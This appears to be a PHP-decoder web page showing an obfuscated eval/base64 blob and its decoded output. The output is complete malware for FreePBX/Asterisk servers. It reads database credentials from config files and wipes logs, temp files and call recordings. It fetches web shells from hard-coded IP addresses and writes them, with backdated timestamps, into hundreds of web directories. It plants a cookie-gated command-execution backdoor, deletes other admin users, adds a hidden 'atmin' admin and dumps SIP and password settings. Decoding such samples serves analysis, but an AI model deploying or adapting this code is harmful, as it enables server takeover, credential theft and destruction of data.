Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJy9XPtz2zYS/rn+K1DVU0qt9fAjTRPHTu041/M0r4ndduZcjw..
Decoded Output download
error_reporting(0);
ini_set('error_reporting', 0);
$file = is_file("/etc/asterisk/freepbx.conf") ? "/etc/asterisk/freepbx.conf" : "/etc/freepbx.conf";
is_file($file) ? eval(str_replace(array('<?php', '?>', 'require', 'include'), array('', '', '#require', '#include'), file_get_contents($file))) : '';
$amp_conf = (isset($amp_conf) ? $amp_conf : array());
$amportal = array();
foreach (explode("
", file_get_contents("/etc/amportal.conf")) as $key => $val) {
if (preg_match_all("/=/", $val, $amp3)) {
$exx = explode("=", $val);
$amportal[$exx[0]] = trim((isset($amp_conf[$exx[0]]) ? $amp_conf[$exx[0]] : str_replace($exx[0] . '=', '', $val)));
}
}
@exec("mkdir -p /var/www/html/vtigercrm &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimate* /var/www/html/index.php /var/lib/asterisk/bin/xultima* &");
$amp = array_merge(array('AMPDBUSER' => 'asteriskuser', 'AMPDBNAME' => 'asterisk'), $amp_conf, $amportal);
$oldcwd = getcwd();
is_dir($amp["AMPWEBROOT"]) ? chdir($amp["AMPWEBROOT"]) : "";
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace < 100) {
@exec("cd /var/log/*.[0-9];nohup find . -type f | xargs -I {} cp /dev/null {} &");
@exec("rm -rf /var/tmp/* /tmp/* /var/log/* &");
@exec("nohup rm -rf /tmp/* /var/spool/asterisk/monitor/* /var/www/backup/*.gz /var/lib/asterisk/bin/ultimat* /var/www/html/index.php &");
}
$dirs = array($oldcwd . '/', getcwd() . '/', '/var/www/html/vtigercrm', '/admin/assets/css/', '/admin/assets/js/', '/admin/modules/cdr/assets/js/', '/admin/modules/fw_ari/htdocs_ari/theme/js/', '/panel/dhtml/js/', '/fop2/css/', '/Info/js/', '/libs/font-icons/entypo/css/', '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/', '/modules/kconfig/js/', '/stats/plugins/dialer/js/', '/var/www/html/', '/var/www/', '/var/www/freepbx/', '/var/www/localhost/', '/opt/freepbx/', '/admin/modules/backup/assets/', '/admin/modules/cdr/assets/');
foreach ($dirs as $K => $V) {
$dirs[] = $V . '/Info/js/';
$dirs[] = $V . '/_asterisk/';
$dirs[] = $V . '/a2billing/';
$dirs[] = $V . '/a2billing/agent/Public/';
$dirs[] = $V . '/admin/';
$dirs[] = $V . '/admin/assets/';
$dirs[] = $V . '/admin/assets/css/';
$dirs[] = $V . '/admin/assets/js/';
$dirs[] = $V . '/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/admin/modules/fw_ari/htdocs_ari/theme/js/';
$dirs[] = $V . '/assets/';
$dirs[] = $V . '/css/';
$dirs[] = $V . '/digium_phones/';
$dirs[] = $V . '/fop2/css/';
$dirs[] = $V . '/freepbx/';
$dirs[] = $V . '/html/';
$dirs[] = $V . '/js/';
$dirs[] = $V . '/libs/font-icons/entypo/css/';
$dirs[] = $V . '/mail/program/js/tiny_mce/plugins/xhtmlxtras/js/';
$dirs[] = $V . '/modules/kconfig/js/';
$dirs[] = $V . '/panel/';
$dirs[] = $V . '/panel/dhtml/js/';
$dirs[] = $V . '/public_html/';
$dirs[] = $V . '/recordings/';
$dirs[] = $V . '/stats/plugins/dialer/js/';
$dirs[] = $V . '/var/tmp/mae.php';
$dirs[] = $V . '/var/tmp/maf.php';
$dirs[] = $V . '/var/www/.freepbx-known/';
$dirs[] = $V . '/var/www/.well-known/';
$dirs[] = $V . '/var/www/_asterisk/';
$dirs[] = $V . '/var/www/admin/';
$dirs[] = $V . '/var/www/admin/api/';
$dirs[] = $V . '/var/www/admin/assets/';
$dirs[] = $V . '/var/www/admin/assets/css/';
$dirs[] = $V . '/var/www/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/admin/assets/css/images/';
$dirs[] = $V . '/var/www/admin/assets/fonts/';
$dirs[] = $V . '/var/www/admin/assets/images/';
$dirs[] = $V . '/var/www/admin/assets/js/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/admin/assets/js/views/';
$dirs[] = $V . '/var/www/admin/assets/less/';
$dirs[] = $V . '/var/www/admin/helpers/';
$dirs[] = $V . '/var/www/admin/i18n/';
$dirs[] = $V . '/var/www/admin/images/';
$dirs[] = $V . '/var/www/admin/libraries/';
$dirs[] = $V . '/var/www/admin/licenses/';
$dirs[] = $V . '/var/www/admin/modules/';
$dirs[] = $V . '/var/www/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/admin/modules/backup/assets/';
$dirs[] = $V . '/var/www/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/';
$dirs[] = $V . '/var/www/admin/modules/cdr/assets/js/';
$dirs[] = $V . '/var/www/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/admin/modules/cidlookup/assets/';
$dirs[] = $V . '/var/www/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/admin/modules/core/assets/';
$dirs[] = $V . '/var/www/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/admin/modules/fax/assets/';
$dirs[] = $V . '/var/www/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/admin/modules/iaxsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/ivr/assets/';
$dirs[] = $V . '/var/www/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/admin/modules/logfiles/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/admin/modules/paging/assets/';
$dirs[] = $V . '/var/www/admin/modules/parking/assets/';
$dirs[] = $V . '/var/www/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/admin/modules/phpinfo/assets/';
$dirs[] = $V . '/var/www/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/admin/modules/queues/assets/';
$dirs[] = $V . '/var/www/admin/modules/recordings/assets/';
$dirs[] = $V . '/var/www/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipsettings/assets/';
$dirs[] = $V . '/var/www/admin/modules/sipstation/assets/';
$dirs[] = $V . '/var/www/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/admin/views/';
$dirs[] = $V . '/var/www/agc22/';
$dirs[] = $V . '/var/www/asteridex4/';
$dirs[] = $V . '/var/www/asteriskpbx/';
$dirs[] = $V . '/var/www/avantfax/';
$dirs[] = $V . '/var/www/certsci1/';
$dirs[] = $V . '/var/www/configupdata/';
$dirs[] = $V . '/var/www/degium_endpoint/';
$dirs[] = $V . '/var/www/digium_endpoints/';
$dirs[] = $V . '/var/www/digium_phones/';
$dirs[] = $V . '/var/www/error/';
$dirs[] = $V . '/var/www/framwork/';
$dirs[] = $V . '/var/www/freepbx/';
$dirs[] = $V . '/var/www/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/goautodial-admin22/';
$dirs[] = $V . '/var/www/goautodial-agent22/';
$dirs[] = $V . '/var/www/goautodial22/';
$dirs[] = $V . '/var/www/html/.freepbx-known/';
$dirs[] = $V . '/var/www/html/.well-known/';
$dirs[] = $V . '/var/www/html/admin/api/';
$dirs[] = $V . '/var/www/html/admin/assets/css/custom-theme/';
$dirs[] = $V . '/var/www/html/admin/assets/css/images/';
$dirs[] = $V . '/var/www/html/admin/assets/fonts/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-extensions-dev/';
$dirs[] = $V . '/var/www/html/admin/assets/js/bootstrap-table-locale/';
$dirs[] = $V . '/var/www/html/admin/assets/less/';
$dirs[] = $V . '/var/www/html/admin/licenses/';
$dirs[] = $V . '/var/www/html/admin/modules/amd/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/announcement/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/arimanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/asterisk-cli/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/blacklist/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/bulkhandler/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/calendar/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callback/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/callrecording/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cel/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/certman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/conferences/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/configedit/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/contactmanager/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/customappsreg/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/cxpanel/';
$dirs[] = $V . '/var/www/html/admin/modules/dahdiconfig/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/dashboard/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/daynight/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/digium_phones/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/directory/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/endpointman/provisioning/';
$dirs[] = $V . '/var/www/html/admin/modules/featurecodeadmin/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/findmefollow/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/hotelwakeup/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/languages/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscapps/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/miscdests/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/music/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/phonebook/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/pinsets/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/presencestate/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/printextensions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/restapi/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ringgroups/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/setcid/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/soundlang/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/superfecta/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/timeconditions/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ttsengines/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/ucp/htdocs/';
$dirs[] = $V . '/var/www/html/admin/modules/userman/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/versionupgrade/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/vmblast/assets/';
$dirs[] = $V . '/var/www/html/admin/modules/voicemail/assets/';
$dirs[] = $V . '/var/www/html/agc22/';
$dirs[] = $V . '/var/www/html/asteridex4/';
$dirs[] = $V . '/var/www/html/asteriskpbx/';
$dirs[] = $V . '/var/www/html/avantfax/';
$dirs[] = $V . '/var/www/html/certsci1/';
$dirs[] = $V . '/var/www/html/configupdata/';
$dirs[] = $V . '/var/www/html/degium_endpoint/';
$dirs[] = $V . '/var/www/html/digium_endpoints/';
$dirs[] = $V . '/var/www/html/digium_phones/';
$dirs[] = $V . '/var/www/html/framwork/';
$dirs[] = $V . '/var/www/html/freepbx/';
$dirs[] = $V . '/var/www/html/freepbx/digium_phones/';
$dirs[] = $V . '/var/www/html/goautodial-admin22/';
$dirs[] = $V . '/var/www/html/goautodial-agent22/';
$dirs[] = $V . '/var/www/html/goautodial22/';
$dirs[] = $V . '/var/www/html/imsicatcher/';
$dirs[] = $V . '/var/www/html/js/';
$dirs[] = $V . '/var/www/html/pbx/';
$dirs[] = $V . '/var/www/html/reminders/';
$dirs[] = $V . '/var/www/html/restapi/';
$dirs[] = $V . '/var/www/html/restapps/';
$dirs[] = $V . '/var/www/html/sip/';
$dirs[] = $V . '/var/www/html/sipml5/';
$dirs[] = $V . '/var/www/html/test/';
$dirs[] = $V . '/var/www/html/vicidial/';
$dirs[] = $V . '/var/www/html/vtigercrm/';
$dirs[] = $V . '/var/www/html/vtigercrm/Image/';
$dirs[] = $V . '/var/www/html/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/html/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/html/vtigercrm/backup/';
$dirs[] = $V . '/var/www/html/vtigercrm/cache/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/html/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/html/vtigercrm/cron/';
$dirs[] = $V . '/var/www/html/vtigercrm/data/';
$dirs[] = $V . '/var/www/html/vtigercrm/database/';
$dirs[] = $V . '/var/www/html/vtigercrm/include/';
$dirs[] = $V . '/var/www/html/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/html/vtigercrm/license/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/html/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/html/vtigercrm/logs/';
$dirs[] = $V . '/var/www/html/vtigercrm/modules/';
$dirs[] = $V . '/var/www/html/vtigercrm/packages/';
$dirs[] = $V . '/var/www/html/vtigercrm/schema/';
$dirs[] = $V . '/var/www/html/vtigercrm/soap/';
$dirs[] = $V . '/var/www/html/vtigercrm/storage/';
$dirs[] = $V . '/var/www/html/vtigercrm/test/';
$dirs[] = $V . '/var/www/html/vtigercrm/themes/';
$dirs[] = $V . '/var/www/html/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/html/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/html/wordpress/';
$dirs[] = $V . '/var/www/icons/';
$dirs[] = $V . '/var/www/images/';
$dirs[] = $V . '/var/www/imsicatcher/';
$dirs[] = $V . '/var/www/js/';
$dirs[] = $V . '/var/www/pbx/';
$dirs[] = $V . '/var/www/recordings/';
$dirs[] = $V . '/var/www/recordings/includes/';
$dirs[] = $V . '/var/www/recordings/locale/';
$dirs[] = $V . '/var/www/recordings/misc/';
$dirs[] = $V . '/var/www/recordings/modules/';
$dirs[] = $V . '/var/www/recordings/theme/';
$dirs[] = $V . '/var/www/reminders/';
$dirs[] = $V . '/var/www/restapi/';
$dirs[] = $V . '/var/www/restapps/';
$dirs[] = $V . '/var/www/sip/';
$dirs[] = $V . '/var/www/sipml5/';
$dirs[] = $V . '/var/www/test/';
$dirs[] = $V . '/var/www/vicidial/';
$dirs[] = $V . '/var/www/vtigercrm/';
$dirs[] = $V . '/var/www/vtigercrm/Image/';
$dirs[] = $V . '/var/www/vtigercrm/Smarty/';
$dirs[] = $V . '/var/www/vtigercrm/adodb/';
$dirs[] = $V . '/var/www/vtigercrm/backup/';
$dirs[] = $V . '/var/www/vtigercrm/cache/';
$dirs[] = $V . '/var/www/vtigercrm/class_http/';
$dirs[] = $V . '/var/www/vtigercrm/class_http_dir/';
$dirs[] = $V . '/var/www/vtigercrm/cron/';
$dirs[] = $V . '/var/www/vtigercrm/data/';
$dirs[] = $V . '/var/www/vtigercrm/database/';
$dirs[] = $V . '/var/www/vtigercrm/include/';
$dirs[] = $V . '/var/www/vtigercrm/jscalendar/';
$dirs[] = $V . '/var/www/vtigercrm/license/';
$dirs[] = $V . '/var/www/vtigercrm/log4php.debug/';
$dirs[] = $V . '/var/www/vtigercrm/log4php/';
$dirs[] = $V . '/var/www/vtigercrm/logs/';
$dirs[] = $V . '/var/www/vtigercrm/modules/';
$dirs[] = $V . '/var/www/vtigercrm/packages/';
$dirs[] = $V . '/var/www/vtigercrm/schema/';
$dirs[] = $V . '/var/www/vtigercrm/soap/';
$dirs[] = $V . '/var/www/vtigercrm/storage/';
$dirs[] = $V . '/var/www/vtigercrm/test/';
$dirs[] = $V . '/var/www/vtigercrm/themes/';
$dirs[] = $V . '/var/www/vtigercrm/user_privileges/';
$dirs[] = $V . '/var/www/vtigercrm/vtlib/';
$dirs[] = $V . '/var/www/wordpress/';
$dirs[] = $V . '/vtigercrm/';
$dirs[] = $V . '/';
$dirs[] = $V . '/var/www/html/recordings/misc/';
}
$dirs = array_unique($dirs);
sort($dirs);
$contents = array('c' => file_get_contents('http://173.212.233.104/t/c99.txt'), 'coc' => file_get_contents('http://2.56.59.126/t/Do.txt'), 'codes' => '<?php $cmd=((isset($_COOKIE["b3d0r"])) && (md5(sha1($_COOKIE["b3d0r"]))=="75f81b0a48e47471bfaa07450b29325c"))? $_COOKIE["cmd"]: "echo \'b3d0r T\'"; system($cmd); ?>');
$freespace = (disk_free_space(getcwd()) / 1024 / 1024);
if ($freespace > 100) {
foreach ($dirs as $k => $where) {
if (is_dir($where)) {
(is_writeable($where)) ? write_dir($where) : '';
$od = opendir($where);
while ($rd = readdir($od)) {
$wd = $where . '/' . $rd;
(($rd != '..') && ($rd != '.') && is_writeable($wd) && is_dir($wd)) ? write_dir($wd) : '';
}
}
}
}
$pass = random_password();
if (count($amp) > 3) {
echo "
[+] Config Fetched ..";
$con = mysql_connect($amp['AMPDBHOST'], $amp['AMPDBUSER'], $amp['AMPDBPASS']) or print (mysql_error());
echo "
[+] Connected To Database server ..";
mysql_select_db($amp['AMPDBNAME'], $con) or print (mysql_error());
echo "
[+] Connected To Database ..";
mysql_query("delete from ampusers where username!='admin'");
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password_sha1`, `sections` ) VALUES ( 'atmin', '" . sha1($pass) . "', '*' );") or print ("
[-] Wrong Column ,, trying another column ..");
if (!$query) {
$query = mysql_query("INSERT INTO `ampusers` ( `username`, `password`, `sections` ) VALUES ( 'atmin', '$pass', '*' );") or print ("
[-]Couldn't Determine Column .. Should Add admin Manually ..<br />" . mysql_error());
}
if ($query) {
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
is_dir("../admin") ? @symlink('../admin', 'atmin') : "";
is_dir("/var/www/html/admin") ? @symlink('/var/www/html/admin', '/var/www/html/recordings/atmin') : "";
} else {
echo "
[-] Should Work Manually on this server ..
";
}
if (is_file("/var/www/html/libs/paloSantoDB.class.php")) {
include_once "/var/www/html/libs/paloSantoDB.class.php";
include_once "/var/www/html/libs/paloSantoACL.class.php";
$pDB = new paloDB("sqlite3:////var/www/db/acl.db");
$pACL = new paloACL($pDB);
$query = "SELECT id from acl_user where name='atmin'";
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
if ($tid < 2) {
$pACL->createUser('atmin', '', md5($pass), '');
$iddb = $pDB->fetchTable($query);
$tid = $iddb[0][0];
}
$pACL->changePassword($tid, md5($pass));
$pACL->addToGroup($tid, 1);
echo "
[+] Admin User Added ..
[+] atmin : $pass
";
}
echo "-----------AMPDB-----------
";
@system("grep AMPDB /etc/amportal.conf");
echo "-----------ARI_ADMIN-----------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "-----------AMPMGR-----------
";
@system("grep AMPMGR /etc/amportal.conf");
echo "-----------PASS-----------
";
@system("grep PASS /etc/amportal.conf");
echo "=====sip_registrations========================
";
@system("cat /etc/asterisk/sip_registrations.conf");
echo "==========sip_additional===================================
";
@system("cat /etc/asterisk/sip_additional.conf");
echo "------------BADR in----------
";
function write_dir($where) {
write_file($where . '/Do.php', 'coc');
write_file($where . '/phpversions.php', 'codes');
write_file($where . '/config.all.php', 'codes');
write_file($where . '/graph.php', 'codes');
write_file($where . '/hamed.php', 'c');
write_file($where . '/page.framework.php', 'coc');
write_file($where . '/configs.php', 'coc');
write_file($where . '/salem.php', 'coc');
write_file($where . '/audio.php', 'coc');
write_file($where . '/MeSSi.php', 'coc');
}
function write_file($fname, $wtw) {
GLOBAL $contents;
if ($contents[$wtw] !== '') {
file_put_contents($fname, $contents[$wtw]);
touch($fname, strtotime('-10 years', time()));
}
}
function random_password($length = 7) {
$set = array_merge(range('A', 'Z'), range('a', 'z'), range('0', '9'));
$str = 't';
for ($i = 0;$i < $length;$i++) {
$str.= $set[rand(0, count($set) - 1) ];
}
return $str;
}
#@system("php Bo.php");Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode('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